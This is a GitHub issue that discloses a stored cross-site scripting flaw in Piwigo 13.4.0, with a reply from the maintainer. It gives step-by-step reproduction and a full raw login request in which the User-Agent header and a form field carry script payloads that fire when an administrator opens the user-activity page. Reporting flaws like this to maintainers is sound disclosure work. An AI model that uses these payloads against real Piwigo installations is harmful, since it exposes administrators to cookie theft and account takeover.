Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent #1835

Closed
Sakura-501 opened this issue Dec 21, 2022 · 0 comments
Closed

Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent #1835

Sakura-501 opened this issue Dec 21, 2022 · 0 comments
Assignees
Milestone

Comments

@Sakura-501
Copy link

Hello, I found Stored XSS in Piwigo version 13.4.0.
Impact:
In this way, ordinary users can be promoted to administrator users.

Here are the complete attack steps:

  1. Register an ordinary user.
    image

  2. Sign out.

  3. POST messages with burpsuite, and change User-Agent's data to xss-payload. Here's an example.

POST /src/piwigo/identification.php HTTP/1.1
Host: 192.168.2.153
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.153
Content-Type: application/x-www-form-urlencoded
User-Agent:  <script>alert(document.cookie);</script> (<svg+onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.153/src/piwigo/identification.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phavsz=1445x798x1.25; pwg_id=ocv8aqqvjkdcshuv99j8l3ctub; pwg_tags_per_page=100; pwg_album_manager_view=tile; PHPSESSID=pfjer613d8pnr8ou8uj458i837
Connection: close

username=w1nd&password=123456&remember_me=<svg+onload=alert(1)>&redirect=&login=%E6%8F%90%E4%BA%A4

image

  1. Finally, when the administrator user logs in and visit /admin.php?page=user_activity, the stored xss will be triggered.
    /admin.php?page=user_activity

image

image

Please fix the vulnerability & let me know :).
Thank You!

@plegall plegall self-assigned this Dec 25, 2022
@plegall plegall added this to the 13.5.0 milestone Dec 25, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants